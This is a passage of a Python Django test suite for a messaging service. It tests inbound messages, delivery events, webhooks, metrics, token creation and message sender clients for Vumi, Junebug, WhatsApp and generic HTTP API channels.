"message_id": message_id,
"in_reply_to": out.vumi_message_id,
"to_addr": "+27820000123",
"from_addr": "+27820000020",
"content": "Call delivered",
"transport_name": "test_voice",
"transport_type": "voice",
"helper_metadata": {},
"session_event": "close",
}
channel = Channel.objects.get(channel_id="VUMI_VOICE")
with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
response = self.client.post(
"/api/v1/inbound/VUMI_VOICE/",
json.dumps(post_inbound),
content_type="application/json",
)
mock_method.assert_called_once_with(channel, out.created_at)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.to_addr, "+27820000123")
self.assertEqual(d.from_addr, "")
self.assertEqual(d.from_identity, "0c03d360")
self.assertEqual(d.content, "Call delivered")
self.assertEqual(d.transport_name, "test_voice")
self.assertEqual(d.transport_type, "voice")
self.assertEqual(d.helper_metadata, {"session_event": "close"})
@responses.activate
def test_create_inbound_data_with_channel_junebug(self):
"""
When an inbound message is created from Junebug, it should set the
channel specified in the URL as the channel on the inbound message.
"""
self.add_metrics_response()
self.add_identity_search_response("+27820000020", "0c03d360")
existing_outbound = self.make_outbound()
out = Outbound.objects.get(pk=existing_outbound)
out.last_sent_time = out.created_at
out.save()
message_id = str(uuid.uuid4())
post_inbound = {
"message_id": message_id,
"in_reply_to": out.vumi_message_id,
"to_addr": "+27820000123",
"from_addr": "+27820000020",
"content": "Call delivered",
"transport_name": "test_voice",
"transport_type": "voice",
"helper_metadata": {},
"session_event": "close",
}
channel = Channel.objects.get(channel_id="VUMI_VOICE")
with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
response = self.client.post(
"/api/v1/inbound/VUMI_VOICE/",
json.dumps(post_inbound),
content_type="application/json",
)
mock_method.assert_called_once_with(channel, out.created_at)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.to_addr, "+27820000123")
self.assertEqual(d.from_addr, "")
self.assertEqual(d.from_identity, "0c03d360")
self.assertEqual(d.content, "Call delivered")
self.assertEqual(d.transport_name, "test_voice")
self.assertEqual(d.transport_type, "voice")
self.assertEqual(d.helper_metadata, {"session_event": "close"})
@responses.activate
def test_create_inbound_data_with_channel_whatsapp(self):
"""
When an inbound message is created from WhatsApp, it should create an Inbound
with the correct details
"""
self.add_metrics_response()
identity_uuid = str(uuid.uuid4())
self.add_identity_search_response("+27820000000", identity_uuid)
message_id = str(uuid.uuid4())
post_inbound = {
"id": message_id,
"from": "27820000000",
"text": {"body": "Test message"},
}
response = self.client.post(
"/api/v1/inbound/WHATSAPP/",
json.dumps(post_inbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.from_identity, identity_uuid)
self.assertEqual(d.content, "Test message")
def test_update_inbound_data(self):
existing_outbound = self.make_outbound()
out = Outbound.objects.get(pk=existing_outbound)
existing = self.make_inbound(out.vumi_message_id)
patch_inbound = {"content": "Opt out"}
response = self.client.patch(
"/api/v1/inbound/%s/" % existing,
json.dumps(patch_inbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Inbound.objects.get(pk=existing)
self.assertEqual(d.to_addr, "+27820000123")
self.assertEqual(d.from_addr, "+27820000020")
self.assertEqual(d.content, "Opt out")
self.assertEqual(d.transport_name, "test_voice")
self.assertEqual(d.transport_type, "voice")
self.assertEqual(d.helper_metadata, {})
def test_delete_inbound_data(self):
existing_outbound = self.make_outbound()
out = Outbound.objects.get(pk=existing_outbound)
existing = self.make_inbound(out.vumi_message_id)
response = self.client.delete(
"/api/v1/inbound/%s/" % existing, content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
d = Inbound.objects.filter(id=existing).count()
self.assertEqual(d, 0)
@patch("message_sender.views.fire_delivery_hook")
def test_event_ack(self, mock_hook):
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
ack = {
"message_type": "event",
"event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
"event_type": "ack",
"user_message_id": d.vumi_message_id,
"helper_metadata": {},
"timestamp": "2015-10-28 16:19:37.485612",
"sent_message_id": "external-id",
}
response = self.client.post(
"/api/v1/events", json.dumps(ack), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, True)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata["ack_timestamp"], "2015-10-28 16:19:37.485612")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
@patch("message_sender.views.fire_delivery_hook")
def test_event_delivery_report(self, mock_hook):
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
dr = {
"message_type": "event",
"event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
"event_type": "delivery_report",
"user_message_id": d.vumi_message_id,
"helper_metadata": {},
"timestamp": "2015-10-28 16:20:37.485612",
"sent_message_id": "external-id",
}
response = self.client.post(
"/api/v1/events", json.dumps(dr), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, True)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata["delivery_timestamp"], "2015-10-28 16:20:37.485612")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
@responses.activate
@patch("message_sender.views.fire_delivery_hook")
def test_event_nack_first(self, mock_hook):
self.add_metrics_response()
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
post_save.connect(
psh_fire_msg_action_if_new,
sender=Outbound,
dispatch_uid="psh_fire_msg_action_if_new",
)
nack = {
"message_type": "event",
"event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
"event_type": "nack",
"nack_reason": "no answer",
"user_message_id": d.vumi_message_id,
"helper_metadata": {},
"timestamp": "2015-10-28 16:20:37.485612",
"sent_message_id": "external-id",
}
response = self.client.post(
"/api/v1/events", json.dumps(nack), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
c = Outbound.objects.get(pk=existing)
self.assertEqual(c.delivered, False)
self.assertEqual(c.attempts, 2)
self.assertEqual(c.metadata["nack_reason"], "no answer")
self.assertEqual(
True,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123' "
"[session_event: new]"
),
)
mock_hook.assert_called_once_with(d)
# TODO: Bring metrics back
# self.assertEquals(
# True,
# self.check_logs("Metric: 'vumimessage.tries' [sum] -> 1"))
@responses.activate
def test_event_nack_last(self):
self.add_metrics_response()
# Be assured this is last message attempt
outbound_message = {
"to_addr": "+27820000123",
"vumi_message_id": "08b34de7-c6da-4853-a74d-9458533ed169",
"content": "Simple outbound message",
"delivered": False,
"attempts": 3,
"metadata": {},
}
failed = Outbound.objects.create(**outbound_message)
failed.last_sent_time = failed.created_at
failed.save()
post_save.connect(
psh_fire_msg_action_if_new,
sender=Outbound,
dispatch_uid="psh_fire_msg_action_if_new",
)
nack = {
"message_type": "event",
"event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
"event_type": "nack",
"nack_reason": "no answer",
"user_message_id": failed.vumi_message_id,
"helper_metadata": {},
"timestamp": "2015-10-28 16:20:37.485612",
"sent_message_id": "external-id",
}
response = self.client.post(
"/api/v1/events", json.dumps(nack), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=failed.id)
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 3) # not moved on as last attempt passed
self.assertEqual(d.metadata["nack_reason"], "no answer")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
"[session_event: new]"
),
)
# TODO: Bring metrics back
# self.assertEquals(
# False,
# self.check_logs("Metric: 'vumimessage.tries' [sum] -> 1"))
# self.assertEquals(
# True,
# self.check_logs("Metric: 'vumimessage.maxretries' [sum] -> 1"))
@responses.activate
def test_fire_delivery_hook_max_retries_not_reached(self):
"""
This should not fire the hook
"""
Hook.objects.create(
user=self.user,
event="outbound.delivery_report",
target="http://example.com",
)
d = Outbound.objects.get(pk=self.make_outbound())
responses.add(
responses.POST,
"http://example.com",
status=200,
content_type="application/json",
)
fire_delivery_hook(d)
self.assertEqual(len(responses.calls), 0)
@responses.activate
def test_fire_delivery_hook_max_retries_reached(self):
"""
This should call deliver_hook_wrapper to send data to a web hook
"""
hook = Hook.objects.create(
user=self.user,
event="outbound.delivery_report",
target="http://example.com",
)
d = Outbound.objects.get(pk=self.make_outbound())
d.attempts = 3
d.save()
responses.add(
responses.POST,
"http://example.com",
status=200,
content_type="application/json",
)
fire_delivery_hook(d)
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(
r["hook"], {"id": hook.id, "event": hook.event, "target": hook.target}
)
self.assertEqual(
r["data"],
{
"delivered": False,
"to_addr": d.to_addr,
"outbound_id": str(d.id),
"identity": d.to_identity,
},
)
@responses.activate
def test_fire_delivery_hook_when_delivered(self):
"""
This should call deliver_hook_wrapper to send data to a web hook
"""
hook = Hook.objects.create(
user=self.user,
event="outbound.delivery_report",
target="http://example.com",
)
d = Outbound.objects.get(pk=self.make_outbound())
d.delivered = True
d.save()
responses.add(
responses.POST,
"http://example.com",
status=200,
content_type="application/json",
)
fire_delivery_hook(d)
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(
r["hook"], {"id": hook.id, "event": hook.event, "target": hook.target}
)
self.assertEqual(
r["data"],
{
"delivered": True,
"to_addr": d.to_addr,
"outbound_id": str(d.id),
"identity": d.to_identity,
},
)
class TestJunebugMessagesAPI(AuthenticatedAPITestCase):
def test_event_missing_fields(self):
"""
If there are missing fields in the request, and error response should
be returned.
"""
response = self.client.post(
"/api/v1/events/junebug", json.dumps({}), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_event_no_message(self):
"""
If we cannot find the message for the event, and error response should
be returned.
"""
ack = {
"event_type": "submitted",
"message_id": "bad-message-id",
"channel-id": "channel-uuid-1234",
"timestamp": "2015-10-28 16:19:37.485612",
"event_details": {},
}
response = self.client.post(
"/api/v1/events/junebug", json.dumps(ack), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch("message_sender.views.fire_delivery_hook")
def test_event_ack(self, mock_hook):
"""A submitted event should update the message object accordingly."""
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
ack = {
"event_type": "submitted",
"message_id": d.vumi_message_id,
"channel-id": "channel-uuid-1234",
"timestamp": "2015-10-28 16:19:37.485612",
"event_details": {},
}
response = self.client.post(
"/api/v1/events/junebug", json.dumps(ack), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, True)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata["ack_timestamp"], "2015-10-28 16:19:37.485612")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
@responses.activate
@patch("message_sender.views.fire_delivery_hook")
def test_event_nack(self, mock_hook):
"""
A rejected event should retry and update the message object accordingly
"""
self.add_metrics_response()
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
post_save.connect(
psh_fire_msg_action_if_new,
sender=Outbound,
dispatch_uid="psh_fire_msg_action_if_new",
)
nack = {
"event_type": "rejected",
"message_id": d.vumi_message_id,
"channel-id": "channel-uuid-1234",
"timestamp": "2015-10-28 16:19:37.485612",
"event_details": {"reason": "No answer"},
}
response = self.client.post(
"/api/v1/events/junebug", json.dumps(nack), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
c = Outbound.objects.get(pk=existing)
self.assertEqual(c.delivered, False)
self.assertEqual(c.attempts, 2)
self.assertEqual(c.metadata["nack_reason"], {"reason": "No answer"})
self.assertEqual(
True,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123' "
"[session_event: new]"
),
)
mock_hook.assert_called_once_with(d)
@patch("message_sender.views.fire_delivery_hook")
def test_event_delivery_succeeded(self, mock_hook):
"""A successful delivery should update the message accordingly."""
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
dr = {
"event_type": "delivery_succeeded",
"message_id": d.vumi_message_id,
"channel-id": "channel-uuid-1234",
"timestamp": "2015-10-28 16:19:37.485612",
"event_details": {},
}
response = self.client.post(
"/api/v1/events/junebug", json.dumps(dr), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, True)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata["delivery_timestamp"], "2015-10-28 16:19:37.485612")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
@responses.activate
@patch("message_sender.views.fire_delivery_hook")
def test_event_delivery_failed(self, mock_hook):
"""
A failed delivery should retry and update the message accordingly.
"""
self.add_metrics_response()
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
dr = {
"event_type": "delivery_failed",
"message_id": d.vumi_message_id,
"channel-id": "channel-uuid-1234",
"timestamp": "2015-10-28 16:19:37.485612",
"event_details": {},
}
response = self.client.post(
"/api/v1/events/junebug", json.dumps(dr), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 2)
self.assertEqual(d.metadata["delivery_failed_reason"], {})
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
@responses.activate
def test_create_inbound_junebug_message(self):
"""
If Junebug send an inbound message to the inbound endpoint, then a
new Inbound should be created with the specified parameters.
"""
self.add_metrics_response()
existing_outbound = self.make_outbound()
out = Outbound.objects.get(pk=existing_outbound)
out.last_sent_time = out.created_at
out.save()
message_id = str(uuid.uuid4())
post_inbound = {
"message_id": message_id,
"reply_to": "test_id",
"to": "0.0.0.0:9001",
"from": out.to_addr,
"content": "Call delivered",
"channel_id": "test_voice",
"channel_data": {"session_event": "close"},
}
self.add_identity_search_response(out.to_addr, "0c03d360")
response = self.client.post(
"/api/v1/inbound/",
json.dumps(post_inbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.to_addr, "0.0.0.0:9001")
self.assertEqual(d.from_addr, "")
self.assertEqual(d.from_identity, "0c03d360")
self.assertEqual(d.content, "Call delivered")
self.assertEqual(d.transport_name, "test_voice")
self.assertEqual(d.transport_type, None)
self.assertEqual(d.helper_metadata, {"session_event": "close"})
@responses.activate
def test_create_inbound_junebug_unknown_msisdn(self):
"""
If Junebug sends a new inbound message to the inbound endpoint, for
an address that doesn't exist in the identity store, then a new
identity should be created for that address.
"""
self.add_metrics_response()
existing_outbound = self.make_outbound()
out = Outbound.objects.get(pk=existing_outbound)
out.last_sent_time = out.created_at
out.save()
message_id = str(uuid.uuid4())
post_inbound = {
"message_id": message_id,
"reply_to": "test_id",
"to": "0.0.0.0:9001",
"from": out.to_addr,
"content": "Call delivered",
"channel_id": "test_voice",
"channel_data": {"session_event": "close"},
}
self.add_identity_search_response(out.to_addr, "0c03d360")
self.add_create_identity_response("0c03d360", out.to_addr)
response = self.client.post(
"/api/v1/inbound/",
json.dumps(post_inbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.to_addr, "0.0.0.0:9001")
self.assertEqual(d.from_addr, "")
self.assertEqual(d.from_identity, "0c03d360")
self.assertEqual(d.content, "Call delivered")
self.assertEqual(d.transport_name, "test_voice")
self.assertEqual(d.transport_type, None)
self.assertEqual(d.helper_metadata, {"session_event": "close"})
class TestWhatsAppMessagesAPI(AuthenticatedAPITestCase):
@responses.activate
def test_whatsapp_custom_hsm(self):
"""
If we send a message with a template key in the metadata, it should
send an HSM to the WhatsApp API with the parameters specified in the metadata
"""
# This client is mocked for all tests, but we don't want it mocked for this test
mocked_get_client = SendMessage.get_client
SendMessage.get_client = get_client_original
responses.add(
method=responses.POST,
url="http://example.com/v1/messages",
json={"messages": [{"id": "message-id"}]},
)
self.add_metrics_response()
response = self.client.post(
reverse("outbound-list"),
{
"to_identity": "identity-uuid",
"to_addr": "+27820001001",
"content": "ignore",
"channel": "WHATSAPP",
"metadata": {
"template": {
"name": "sbm",
"language": "eng_ZA",
"variables": ["variable1", "variable2"],
}
},
},
format="json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
[call] = list(filter(lambda c: "example.com" in c.request.url, responses.calls))
request = call.request
self.assertEqual(request.headers["Authorization"], "Bearer http-api-token")
self.assertEqual(
json.loads(request.body),
{
"to": "27820001001",
"type": "hsm",
"hsm": {
"namespace": "whatsapp:hsm:test",
"element_name": "sbm",
"language": {"policy": "deterministic", "code": "eng_ZA"},
"localizable_params": [
{"default": "variable1"},
{"default": "variable2"},
],
},
},
)
SendMessage.get_client = mocked_get_client
class TestMetricsAPI(AuthenticatedAPITestCase):
def test_metrics_read(self):
# Setup
# Execute
response = self.client.get("/api/metrics/", content_type="application/json")
# Check
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data["metrics_available"],
[
"vumimessage.tries.sum",
"vumimessage.maxretries.sum",
"vumimessage.obd.tries.sum",
"message.failures.sum",
"message.sent.sum",
"sender.send_message.connection_error.sum",
"sender.send_message.http_error.400.sum",
"sender.send_message.http_error.401.sum",
"sender.send_message.http_error.403.sum",
"sender.send_message.http_error.404.sum",
"sender.send_message.http_error.500.sum",
"sender.send_message.timeout.sum",
],
)
@responses.activate
def test_post_metrics(self):
# Setup
# deactivate Testsession for this test
self.session = None
responses.add(
responses.POST,
"http://metrics-url/metrics/",
json={"foo": "bar"},
status=200,
content_type="application/json",
)
# Execute
response = self.client.post("/api/metrics/", content_type="application/json")
# Check
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data["scheduled_metrics_initiated"], True)
class TestMetrics(AuthenticatedAPITestCase):
@responses.activate
def test_direct_fire(self):
"""
When calling the `fire_metric` task, a call should be make to the
metrics store with the details provided in the task arguments.
"""
# Setup
self.add_metrics_response()
# Execute
result = fire_metric.apply_async(
kwargs={"metric_name": "foo.last", "metric_value": 1}
)
# Check
request = responses.calls[-1].request
self.check_request(request, "POST", data={"foo.last": 1.0})
self.assertEqual(result.get(), "Fired metric <foo.last> with value <1.0>")
class TestHealthcheckAPI(AuthenticatedAPITestCase):
def test_healthcheck_read(self):
# Setup
# Execute
response = self.client.get("/api/health/", content_type="application/json")
# Check
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data["up"], True)
self.assertEqual(response.data["result"]["database"], "Accessible")
class TestUserCreation(AuthenticatedAPITestCase):
def test_create_user_and_token(self):
# Setup
user_request = {"email": "test@example.org"}
# Execute
request = self.adminclient.post("/api/v1/user/token/", user_request)
token = request.json().get("token", None)
# Check
self.assertIsNotNone(token, "Could not receive authentication token on post.")
self.assertEqual(
request.status_code,
201,
"Status code on /api/v1/user/token/ was %s (should be 201)."
% request.status_code,
)
def test_create_user_and_token_fail_nonadmin(self):
# Setup
user_request = {"email": "test@example.org"}
# Execute
request = self.client.post("/api/v1/user/token/", user_request)
error = request.json().get("detail", None)
# Check
self.assertIsNotNone(error, "Could not receive error on post.")
self.assertEqual(
error,
"You do not have permission to perform this action.",
"Error message was unexpected: %s." % error,
)
def test_create_user_and_token_not_created(self):
# Setup
user_request = {"email": "test@example.org"}
# Execute
request = self.adminclient.post("/api/v1/user/token/", user_request)
token = request.json().get("token", None)
# And again, to get the same token
request2 = self.adminclient.post("/api/v1/user/token/", user_request)
token2 = request2.json().get("token", None)
# Check
self.assertEqual(
token, token2, "Tokens are not equal, should be the same as not recreated."
)
def test_create_user_new_token_nonadmin(self):
# Setup
user_request = {"email": "test@example.org"}
request = self.adminclient.post("/api/v1/user/token/", user_request)
token = request.json().get("token", None)
cleanclient = APIClient()
cleanclient.credentials(HTTP_AUTHORIZATION="Token %s" % token)
# Execute
request = cleanclient.post("/api/v1/user/token/", user_request)
error = request.json().get("detail", None)
# Check
# new user should not be admin
self.assertIsNotNone(error, "Could not receive error on post.")
self.assertEqual(
error,
"You do not have permission to perform this action.",
"Error message was unexpected: %s." % error,
)
class TestFormatter(TestCase):
@override_settings(VOICE_TO_ADDR_FORMATTER="message_sender.formatters.noop")
def test_noop(self):
cb = load_callable(settings.VOICE_TO_ADDR_FORMATTER)
self.assertEqual(cb("12345"), "12345")
@override_settings(
VOICE_TO_ADDR_FORMATTER="message_sender.formatters.vas2nets_voice"
)
def test_vas2nets_voice(self):
cb = load_callable(settings.VOICE_TO_ADDR_FORMATTER)
self.assertEqual(cb("+23456"), "9056")
self.assertEqual(cb("23456"), "9056")
@override_settings(
VOICE_TO_ADDR_FORMATTER="message_sender.formatters.vas2nets_text"
)
def test_vas2nets_text(self):
cb = load_callable(settings.VOICE_TO_ADDR_FORMATTER)
self.assertEqual(cb("+23456"), "23456")
self.assertEqual(cb("23456"), "23456")
class TestFactory(TestCase):
def setUp(self):
super(TestFactory, self).setUp()
make_channels()
def test_create_junebug_text(self):
channel = Channel.objects.get(channel_id="JUNE_TEXT")
message_sender = MessageClientFactory.create(channel)
self.assertTrue(isinstance(message_sender, JunebugApiSender))
self.assertEqual(message_sender.api_url, "http://example.com/")
self.assertEqual(message_sender.auth, ("username", "password"))
def test_create_junebug_voice(self):
channel = Channel.objects.get(channel_id="JUNE_VOICE")
message_sender = MessageClientFactory.create(channel)
self.assertTrue(isinstance(message_sender, JunebugApiSender))
self.assertEqual(message_sender.api_url, "http://example.com/")
self.assertEqual(message_sender.auth, ("username", "password"))
def test_create_vumi_text(self):
channel = Channel.objects.get(channel_id="VUMI_TEXT")
message_sender = MessageClientFactory.create(channel)
self.assertTrue(isinstance(message_sender, HttpApiSender))
self.assertEqual(message_sender.api_url, "http://example.com/")
self.assertEqual(message_sender.account_key, "account-key")
self.assertEqual(message_sender.conversation_key, "conv-key")
self.assertEqual(message_sender.conversation_token, "account-token")
def test_create_vumi_voice(self):
channel = Channel.objects.get(channel_id="VUMI_VOICE")
message_sender = MessageClientFactory.create(channel)
self.assertTrue(isinstance(message_sender, HttpApiSender))
self.assertEqual(message_sender.api_url, "http://example.com/")
self.assertEqual(message_sender.account_key, "account-key")
self.assertEqual(message_sender.conversation_key, "conv-key")
self.assertEqual(message_sender.conversation_token, "account-token")
def test_create_http_api_voice(self):
channel = Channel.objects.get(channel_id="HTTP_API_VOICE")
message_sender = MessageClientFactory.create(channel)
self.assertTrue(isinstance(message_sender, HttpApiSender))
self.assertEqual(message_sender.api_url, "http://example.com/")
self.assertEqual(message_sender.auth, ("username", "password"))
def test_create_http_api_text(self):
channel = Channel.objects.get(channel_id="HTTP_API_TEXT")
message_sender = MessageClientFactory.create(channel)
self.assertTrue(isinstance(message_sender, HttpApiSender))
self.assertEqual(message_sender.api_url, "http://example.com/")
self.assertEqual(message_sender.auth, ("username", "password"))
def test_create_whatsapp_api(self):
channel = Channel.objects.get(channel_id="WHATSAPP")
message_sender = MessageClientFactory.create(channel)
self.assertTrue(isinstance(message_sender, WhatsAppApiSender))
self.assertEqual(message_sender.api_url, "http://example.com/")
self.assertEqual(message_sender.token, "http-api-token")
self.assertEqual(message_sender.hsm_namespace, "whatsapp:hsm:test")
self.assertEqual(message_sender.hsm_element_name, "test")
def test_create_no_backend_type_specified_default(self):
"""
If no message backend is specified, it should use the default channel.
"""
message_sender = MessageClientFactory.create()
self.assertTrue(isinstance(message_sender, JunebugApiSender))
self.assertEqual(message_sender.api_url, "http://example.com/")
self.assertEqual(message_sender.auth, ("username", "password"))
class TestGenericHttpApiSender(TestCase):
def setUp(self):
super(TestGenericHttpApiSender, self).setUp()
make_channels()
@responses.activate
def test_send_text(self):
"""
Using the send_text function should send a request to the api with the
correct JSON data.
"""
responses.add(
responses.POST,
"http://example.com/",
json={"result": {"message_id": "message-uuid"}},
status=200,
content_type="application/json",
)
channel = Channel.objects.get(channel_id="HTTP_API_TEXT")
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_text("+1234", "Test", session_event="new")
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(r["to"], "+1234")
self.assertEqual(r["from"], "+4321")
self.assertEqual(r["content"], "Test")
self.assertEqual(r["channel_data"]["session_event"], "new")
@responses.activate
def test_send_voice(self):
"""
Using the send_voice function should send a request to the api with the
correct JSON data.
"""
responses.add(
responses.POST,
"http://example.com/",
json={"result": {"message_id": "message-uuid"}},
status=200,
content_type="application/json",
)
channel = Channel.objects.get(channel_id="HTTP_API_VOICE")
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_voice(
"+1234", "", speech_url="http://sbm.com/test.mp3", session_event="new"
)
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(r["to"], "+1234")
self.assertEqual(r["from"], "+4321")
self.assertEqual(r["content"], "")
self.assertEqual(r["channel_data"]["session_event"], "new")
self.assertEqual(
r["channel_data"]["voice"]["speech_url"], "http://sbm.com/test.mp3"
)
@responses.activate
def test_send_voice_multiple(self):
"""
Using the send_voice function should send a request to the api with the
correct JSON data.
"""
responses.add(
responses.POST,
"http://example.com/",
json={"result": {"message_id": "message-uuid"}},
status=200,
content_type="application/json",
)
channel = Channel.objects.get(channel_id="HTTP_API_VOICE")
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_voice(
"+1234",
"",
speech_url=["http://sbm.com/test1.mp3", "http://sbm.com/test2.mp3"],
session_event="new",
)
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(r["to"], "+1234")
self.assertEqual(r["from"], "+4321")
self.assertEqual(r["content"], "")
self.assertEqual(r["channel_data"]["session_event"], "new")
self.assertEqual(
r["channel_data"]["voice"]["speech_url"],
["http://sbm.com/test1.mp3", "http://sbm.com/test2.mp3"],
)
@responses.activate
def test_send_voice_override_payload(self):
"""
Using the send_voice function should send a request to the api with the
correct JSON data based on the override_payload setting in the channel.
The full path should be stripped if the STRIP_FILEPATH key is present.
"""
responses.add(
responses.POST,
"http://example.com/",
json={"result": {"message_id": "message-uuid"}},
status=200,
content_type="application/json",
)
http_channel_override_payload = {
"channel_id": "HTTP_API_VOICE_OP",
"channel_type": Channel.HTTP_API_TYPE,
"default": False,
"configuration": {
"HTTP_API_URL": "http://example.com/",
"HTTP_API_AUTH": ("username", "password"),
"HTTP_API_FROM": "+4321",
"OVERRIDE_PAYLOAD": {
"mobile_no": "to",
"filename": "channel_data.voice.speech_url",
"nested_data": {"from_addr": "from", "unknown": "unknown"},
},
"STRIP_FILEPATH": "true",
},
"concurrency_limit": 2,
"message_timeout": 20,
"message_delay": 10,
}
channel = Channel.objects.create(**http_channel_override_payload)
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_voice(
"+1234", "", speech_url="http://sbm.com/test.mp3", session_event="new"
)
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(r["mobile_no"], "+1234")
self.assertEqual(r["nested_data"]["from_addr"], "+4321")
self.assertEqual(r["nested_data"]["unknown"], "unknown")
self.assertEqual(r["filename"], "test.mp3")
@responses.activate
def test_send_voice_override_payload_multiple_urls(self):
"""
Using the send_voice function should send a request to the api with the
correct JSON data based on the override_payload setting in the channel.
The full path should be stripped if the STRIP_FILEPATH key is present,
even if there is a list of urls.
"""
responses.add(
responses.POST,
"http://example.com/",
json={"result": {"message_id": "message-uuid"}},
status=200,
content_type="application/json",
)
http_channel_override_payload = {
"channel_id": "HTTP_API_VOICE_OP",
"channel_type": Channel.HTTP_API_TYPE,
"default": False,
"configuration": {
"HTTP_API_URL": "http://example.com/",
"HTTP_API_AUTH": ("username", "password"),
"HTTP_API_FROM": "+4321",
"OVERRIDE_PAYLOAD": {
"mobile_no": "to",
"filename": "channel_data.voice.speech_url",
"nested_data": {"from_addr": "from", "unknown": "unknown"},
},
"STRIP_FILEPATH": "true",
},
"concurrency_limit": 2,
"message_timeout": 20,
"message_delay": 10,
}
channel = Channel.objects.create(**http_channel_override_payload)
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_voice(
"+1234",
"",
speech_url=["http://sbm.com/test1.mp3", "http://sbm.com/test2.mp3"],
session_event="new",
)
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(r["mobile_no"], "+1234")
self.assertEqual(r["nested_data"]["from_addr"], "+4321")
self.assertEqual(r["nested_data"]["unknown"], "unknown")
self.assertEqual(r["filename"], ["test1.mp3", "test2.mp3"])
@responses.activate
def test_send_voice_strip_filepath_language(self):
"""
Using the send_voice function should send a request to the api with the
correct JSON data. The full path should be stripped if the
STRIP_FILEPATH key is present, even if there is a list of urls. If
there is a language code present it should not be removed.
"""
responses.add(
responses.POST,
"http://example.com/",
json={"result": {"message_id": "message-uuid"}},
status=200,
content_type="application/json",
)
